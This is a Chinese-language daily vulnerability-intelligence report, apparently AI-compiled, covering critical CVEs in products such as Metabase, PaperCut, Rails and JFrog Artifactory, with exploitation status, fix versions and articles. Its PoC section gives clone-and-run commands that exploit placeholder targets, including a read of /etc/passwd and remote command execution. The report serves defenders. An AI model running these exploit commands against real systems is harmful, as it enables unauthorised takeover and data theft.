每日安全情报报告 · 2026-09-02
由 AI 整理发布
本报告聚焦 2026-08-31 ~ 2026-09-02(近 24--48 小时) 新增及在野利用的高危漏洞、公开 PoC 与权威安全文章。所有外部链接均为可点击的 Markdown 链接,请优先处置标注 🔴 的在野利用 / CISA KEV 项。
一、本期高风险速览
| 风险级别 | 编号 | 组件 | CVSS | 状态 | 链接 |
|---|---|---|---|---|---|
| 🔴 | CVE-2026-83548 | SonicWall SMA1000(SSRF) | 10.0 | 在野利用 | NVD 详情 |
| 🔴 | CVE-2026-72898 | Metabase(SQL 注入→管理员接管) | 10.0 | CISA KEV·在野 | NVD 详情 |
| 🔴 | CVE-2026-82329 | JFrog Artifactory(认证绕过→管理员) | 9.8 | 在野利用 | NVD 详情 |
| 🔴 | CVE-2026-0768 | Langflow(代码注入 RCE) | 9.8 | 在野利用 | NVD 详情 |
| 🔴 | CVE-2026-66066 | Ruby on Rails(KindaRails2Shell) | 9.5 | 在野利用 | NVD 详情 |
| 🔴 | CVE-2026-81578 / CVE-2026-82078 | PaperCut NG/MF(认证绕过+不安全类加载) | 8.8 / 9.4 | CISA KEV·在野 | NVD 详情 |
| 🔴 | CVE-2026-9586 | Sangoma Switchvox(SQLi→RCE) | 高危 | 在野利用 | Brinztech 警报 |
| 🟠 | CVE-2026-81780 | WordPress Hash Form(任意文件上传 RCE) | 10.0 | 公开 PoC | NVD 详情 |
| 🟠 | CVE-2026-82970 | WordPress WP Cookie Notice(任意文件上传 RCE) | 10.0 | 新增 | Tenable 详情 |
| 🟠 | CVE-2026-82688 / CVE-2026-82691 | D-Link ShareCenter(命令注入 RCE) | 高危 | EOL·公开 PoC | ThreatAft 分析 |
| 🟠 | CVE-2026-83772 | Cobham SATCOM VSAT7090(命令注入) | 9.9 | 公开武器化利用 | NVD 详情 |
| 🟠 | CVE-2026-82971 | QVidium Opera11(CGI 命令注入 RCE) | 10.0 | EOL·无补丁·公开 PoC | NVD 详情 |
| 🟠 | CVE-2026-74233 | Zbtlink / OEM 路由器(infosrvd 命令注入) | 9.8 | 公开 PoC·无补丁 | NVD 详情 |
| 🟠 | CVE-2026-58138 | Orkes Conductor(未认证 RCE) | 9.8 | 已观测利用 | Empirical 分析 |
二、最新高危漏洞
2.1 🔴 在野利用 / CISA KEV(最高优先处置)
CVE-2026-83548 --- SonicWall SMA1000 预认证 SSRF(CVSS 10.0)
- 漏洞类型:服务端请求伪造(SSRF,CWE-918 / CWE-441)
- 受影响组件:SonicWall SMA1000 系列(SMA 6210 / 7210 / 8200v),固件 ≤ 12.4.3-03453、≤ 12.5.0-02835
- CVSS:10.0(Critical)
- 在野利用 :✅ SonicWall PSIRT 于 2026-09-01 确认在野利用,与 CVE-2026-83549 组合可形成完整攻击链
- 修复版本:12.4.3-03526 / 12.5.0-02952(hotfix)
- 链接 :SonicWall 官方公告 SNWLID-2026-0016 · Beazley 分析 · NVD 详情
CVE-2026-83549 --- SonicWall SMA1000 AMC OS 命令注入(CVSS 7.8)
- 漏洞类型:OS 命令注入(CWE-78),需管理员认证
- 受影响组件:SMA1000 Appliance Management Console(AMC)
- 在野利用:✅ 与 CVE-2026-83548 一并确认在野
- 链接 :NVD 详情
CVE-2026-72898 --- Metabase 未认证 SQL 注入→管理员接管(CVSS 10.0)
- 漏洞类型 :SQL 注入(CWE-89),位于
/api/session/reset_password端点,通过user-id字段注入 HoneySQLraw载荷 - 受影响组件:Metabase 0.58.0 ~ 0.63.4(Enterprise 1.58.x ~ 1.63.x),即 1.58 及以上
- CVSS:10.0(Critical)
- 在野利用:✅ CISA KEV(2026-08-11 新增,联邦整改截止 2026-08-14);Metabase Cloud 自身遭入侵,已波及 Framework、n8n、Kilo Code、Tixel 等多家企业
- 修复版本:0.58.24 / 0.59.21 / 0.60.17 / 0.61.11 / 0.62.9 / 0.63.5 及以上
- 链接 :NVD 详情 · Metabase 安全公告 GHSA-vwf4-m7j8-wcjf · 事件报道
CVE-2026-82329 --- JFrog Artifactory 认证绕过→管理员令牌(CVSS 9.8)
- 漏洞类型:认证缺陷(CWE-287),默认配置下未认证攻击者伪造集群 join JWT 获取管理员令牌
- 受影响组件:JFrog Artifactory < 7.111.21、7.117.x < 7.117.28、7.125.x < 7.125.20、7.133.x < 7.133.29、7.146.x < 7.146.38、7.161.x < 7.161.20
- CVSS:9.8(Critical)
- 在野利用:✅ 披露(2026-08-28)后数日内即遭在野利用,可投毒软件供应链
- 链接 :NVD 详情 · JFrog 安全公告 · THN 报道
CVE-2026-0768 --- Langflow 代码注入 RCE(CVSS 9.8)
- 漏洞类型 :代码注入(CWE-94),
/api/v1/validate_code端点未对用户输入做沙箱处理直接exec - 受影响组件:Langflow ≤ 1.4.2(建议升级至 1.11.6)
- CVSS:9.8(Critical)
- 在野利用:✅ VulnCheck 英国蜜罐自 2026-09-01 起观测到 360+ 次利用尝试(多源自俄罗斯),用于窃取 AWS / OpenAI / Langflow 超级用户密钥
- 链接 :NVD 详情 · VulnCheck 通告 · Zeroday.news 报道
CVE-2026-66066 --- Ruby on Rails KindaRails2Shell 任意文件读→RCE(CVSS 9.5)
- 漏洞类型:文件类型混淆导致的任意文件读(CWE),链式 RCE;影响使用 libvips 处理 Active Storage 图片上传的应用
- 受影响组件:Active Storage < 7.2.3.2、8.0.x < 8.0.5.1、8.1.x < 8.1.3.1(需 libvips ≥ 8.13)
- CVSS:9.5(Critical)
- 在野利用:✅ VulnCheck 于 2026-08-25 起确认在野,约 7,000 个公网 Rails 实例受影响;注意:补丁仅封堵 libvips 文件读路径,Marshal 反序列化 RCE 支路在已获取签名时仍可利用
- 链接 :NVD 详情 · SecurityWeek 报道 · Rails 取证指引
CVE-2026-81578 + CVE-2026-82078 --- PaperCut NG/MF 认证绕过 + 不安全类加载(CVSS 8.8 / 9.4)
- 漏洞类型:CWE-305 访问控制缺陷 + CWE-470 不安全反射;二者可链式形成未认证 RCE(以 SYSTEM / root 运行)
- 受影响组件:PaperCut MF/NG 全版本,修复边界 24.1.10 / 25.0.13 / 26.0.5(Emergency Patch Release 2)
- 在野利用:✅ CISA KEV(2026-08-31 新增,截止 2026-09-14);Huntress 在两个客户环境复现完整预认证 RCE 链;约 47% 实例仍运行 v23 或更早(无补丁)
- 链接 :NVD CVE-2026-81578 · NVD CVE-2026-82078 · PaperCut 安全公告 · Huntress 复现报道
CVE-2026-9586 --- Sangoma Switchvox SQLi→RCE(在野利用)
- 漏洞类型:SQL 注入→root 级 RCE(认证绕过)
- 受影响组件:Sangoma Switchvox 统一通信 / PBX 设备
- 在野利用:✅ 2026-08-30 起蜜罐观测自动化扫描与利用,2026-09-01 技术细节与 PoC 公开
- 链接 :Brinztech 警报
其他持续在野(历史 KEV,本期仍需跟踪)
- CVE-2026-60004 Gitea diffpatch RCE(CVSS 9.8,KEV,8,300+ 未修)--- NVD 详情
- CVE-2026-64849 MLflow SSRF 窃云凭据(CVSS 高危,KEV 整改截止 今日 2026-09-02 )--- NVD 详情
- CVE-2026-18885 / CVE-2026-18886 / CVE-2026-74820 ServiceNow AI Platform 三连击(均为 CVSS 10.0 免认证代码注入 / 越权 / SQLi)--- THN 报道
2.2 🟠 近 24--48 小时新增高危(待验证利用,建议尽快修补)
CVE-2026-81780 --- WordPress Hash Form 未认证任意文件上传(CVSS 10.0)
- 漏洞类型:任意文件上传(CWE-434)→ RCE,无需认证
- 受影响组件:Hash Form(hashthemes)≤ 1.4.2
- 修复版本:1.4.3
- 链接 :NVD 详情 · IONIX 分析 · Patchstack 数据库
CVE-2026-82970 --- WordPress WP Cookie Notice 任意文件上传(CVSS 10.0)
- 漏洞类型:任意文件上传(CWE-434)→ RCE
- 受影响组件:WP Cookie Notice for GDPR, CCPA & ePrivacy Consent(gdpr-cookie-consent)≤ 4.4.1
- 链接 :Tenable 详情 · Patchstack 数据库
CVE-2026-82688 / CVE-2026-82691 --- D-Link ShareCenter 命令注入 RCE(EOL)
- 漏洞类型:OS 命令注入(CWE-77),已认证远程命令执行
- 受影响组件:D-Link ShareCenter NAS(已停产,无补丁)
- 公开 PoC:已披露
- 链接 :ThreatAft 分析 · CIRCL CVE-2026-82688
CVE-2026-83772 --- Cobham SATCOM VSAT7090 命令注入(CVSS 9.9)
- 漏洞类型 :命令注入(CWE-77),
mail-report.sh的sender/recipients参数 - 受影响组件:Cobham SATCOM VSAT7090 海事卫星路由器 ≤ 20260704
- 公开武器化利用:✅ 厂商未响应,无官方补丁
- 链接 :NVD 详情 · Brinztech 警报 · VulDB VDB-397501
CVE-2026-82971 --- QVidium Opera11 CGI 命令注入 RCE(CVSS 10.0,EOL 无补丁)
- 漏洞类型 :OS 命令注入(CWE-77),
/cgi-bin/net_tr.cgi的ipaddr参数 - 受影响组件:QVidium Opera11 固件 3.3.2a26-Ax4x-opera11
- 公开 PoC :✅ 已披露;厂商已停业,永无补丁
- 链接 :NVD 详情 · ThreatAft 分析 · VulDB VDB-397334
CVE-2026-74233 --- Zbtlink / OEM 路由器 infosrvd 命令注入(CVSS 9.8)
- 漏洞类型:OS 命令注入(CWE-78)+ 硬编码密钥(CWE-321),UDP/9992 未认证
- 受影响组件:Zbtlink WE1326/WE357/WE5926 等多款及 OEM 白标设备(CTN720-W1、LF-1541、MT7620N、WRC1 等)
- 公开 PoC:✅ 已存在(GHSA-2h7p-q23r-5gcf)
- 缓解:在网络边界封禁 UDP/9992;无厂商修复固件
- 链接 :NVD 详情 · VulnCheck 博客 · Armis 情报
CVE-2026-58138 --- Orkes Conductor 未认证 RCE(CVSS 9.8)
- 漏洞类型 :未认证 RCE,INLINE/LAMBDA/DO_WHILE/SWITCH 任务经 GraalVM
HostAccess.ALL执行任意 OS 命令 - 受影响组件:Orkes Conductor 3.21.21 < 3.30.2(开源版默认无认证)
- 利用情况:✅ Empirical 遥测显示近 7 日内在野(最近 2026-08-21);Exploit-DB 已有利用代码
- 链接 :Empirical 月度 CVE 分析 · Exploit-DB 52633
三、最新漏洞 PoC(含使用步骤)
⚠️ 以下 PoC 仅限授权测试环境使用。运行前务必审阅源码,避免对生产/第三方系统造成未授权影响。
1. Metabase CVE-2026-72898(未认证 SQLi → 管理员会话伪造)
bash
# 1. 克隆仓库
git clone https://github.com/0xBlackash/CVE-2026-72898.git
cd CVE-2026-72898
# 2. 安装依赖
pip install requests
# 3. 运行(非侵入式检测 + 会话伪造)
python3 exploit.py --url http://TARGET:3000
# 说明:STEP 2 返回 HTTP 400 为预期(token 无效,但堆叠 INSERT 已执行);
# 以伪造 Cookie 请求 /api/user/current 返回 200 即接管成功
2. PaperCut NG/MF CVE-2026-81578 / CVE-2026-82078(认证绕过 + 不安全类加载)
bash
git clone https://github.com/yora1928/PaperCut-CVE-2026-81578-82078.git
cd PaperCut-CVE-2026-81578-82078
pip install requests rich
# 资产扫描 / 版本指纹
python3 papercut.py scan --target http://TARGET:9191
# 漏洞自检(loopback 概念验证)
python3 papercut.py exploit --target http://TARGET:9191 --cmd "ipconfig"
3. Ruby on Rails KindaRails2Shell CVE-2026-66066(任意文件读 → RCE)
- 来源 :github.com/0xsha/KindaRails2Shell(含扫描器与 RCE)、github.com/Zer0SumGam3/CVE-2026-66066-POC(最小化 PoC)
- 步骤:
bash
git clone https://github.com/0xsha/KindaRails2Shell.git
cd KindaRails2Shell
pip install requests
# 仅做文件读取探测(非侵入)
python3 kindarails2shell.py --url http://TARGET --read /etc/passwd
# 完整 RCE 请仅在授权环境运行
# python3 kindarails2shell.py --url http://TARGET --rce "id"
4. JFrog Artifactory CVE-2026-82329(未认证认证绕过 → 管理员令牌)
- 来源 :Sploitus: dinosn PoC(含可复现 Docker 实验室 + URL 参数化校验脚本)
- 步骤:
bash
# 拉取 PoC 仓库(Sploitus 页面内附 git 地址,按页面说明克隆)
git clone <dinosn_CVE-2026-82329_repo> && cd CVE-2026-82329
pip install requests
# 验证目标是否可被未认证获取 ADMIN(默认端口 8082)
python3 poc/cve_2026_82329_poc.py http://TARGET:8082
# 成功特征:/registry/join → 201,/access/api/v1/tokens → 200 ADMIN token
5. Orkes Conductor CVE-2026-58138(未认证 RCE)
- 来源 :Exploit-DB 52633(OrkesConductor 3.30.2 - Unauthenticated RCE)
- 步骤:
bash
# 通过 searchsploit 获取
searchsploit OrkesConductor 3.30.2
# 或访问 Exploit-DB 下载对应利用脚本后:
python3 52633.py http://TARGET:8080
# 原理:向 /api/workflow 提交含恶意 INLINE 任务的 workflow 定义,经 GraalVM 逃逸执行系统命令
6. Zbtlink / OEM 路由器 CVE-2026-74233(infosrvd UDP 命令注入)
- 来源 :VulnCheck 博客与 IoC(公开 PoC 机制)、GitHub Advisory GHSA-2h7p-q23r-5gcf
- 步骤:
bash
# 向目标 UDP/9992 发送特制数据包触发 root 命令执行(概念验证)
# 仅授权测试环境执行;生产环境建议直接在网络边界 DROP UDP/9992
# 利用示例(伪代码,需按 VulnCheck 博客实现):
# send_udp(TARGET, 9992, b"<crafted infosrvd packet with shell metachars>")
7. 暂无公开 PoC 的项(厂商已确认在野,需重点监控)
- SonicWall SMA1000 CVE-2026-83548 / CVE-2026-83549 :截至本报告,Beazley 确认无公开 PoC ,但厂商已确认在野。建议立即打 hotfix 并排查 AMC 异常管理员活动 --- SonicWall 公告
- Cobham SATCOM CVE-2026-83772 / QVidium CVE-2026-82971 :厂商未响应,仅第三方(VulDB / ThreatAft)披露利用线索,设备建议立即下线或隔离 --- VulDB VDB-397501 · VulDB VDB-397334
四、网络安全最新文章
- SonicWall SMA 1000 系列两漏洞在野利用(CVE-2026-83548 / 83549) --- Beazley Security Labs 详细分析攻击链与缓解措施。阅读原文
- PaperCut NG/MF 被加入 CISA KEV,确认在野 --- Huntress 复现完整预认证 RCE 链,约 47% 实例运行无补丁的旧版本。阅读原文
- Langflow 关键 RCE 遭在野利用,VulnCheck 观测 360+ 次尝试 --- 攻击者窃取 AWS / OpenAI / Langflow 密钥。阅读原文
- Ruby on Rails KindaRails2Shell 被利用,补丁仍留 RCE 支路 --- SecurityWeek 报道 VulnCheck 发现补丁未完全中和 Marshal 反序列化。阅读原文
- Metabase 零日致多家企业数据泄露(Framework / n8n / Tixel) --- CVE-2026-72898 通过重置密码端点接管管理员。阅读原文
- ServiceNow AI Platform 三个 CVSS 10.0 漏洞(CVE-2026-18885 等) --- THN 汇总 McKesson 2.84 亿条记录泄露等重大事件。阅读原文
- 2026-09-01 网络安全日报(DanSec) --- 涵盖柏林勒索软件、医疗数据泄露、PaperCut/Sangoma/Langflow/Rails 在野利用全景。阅读原文
- Enigma 每日威胁情报摘要 2026-09-01 --- 聚焦 WordPress 插件 CVSS 10.0、Fire Ant 中国关联 APT、医疗行业攻击。阅读原文
- Cobham SATCOM VSAT7090 命令注入漏洞披露(CVE-2026-83772) --- Brinztech 警告海事卫星通信基础设施面临武器化利用。阅读原文
- Sangoma Switchvox SQLi→RCE 在野利用(CVE-2026-9586) --- 技术细节与 PoC 于 9/1 公开后自动化利用激增。阅读原文
- Orkes Conductor CVE-2026-58138:被忽视的 9.8 分未认证 RCE --- Empirical Security 月度 CVE,遥测显示已在野。阅读原文
- BestSec 2026-09-01 安全日报 --- 汇总 Aurora 勒索软件武器化 AI、Claude Code 合规 API、Rails 漏洞等。阅读原文
部分内容由 AI 辅助生成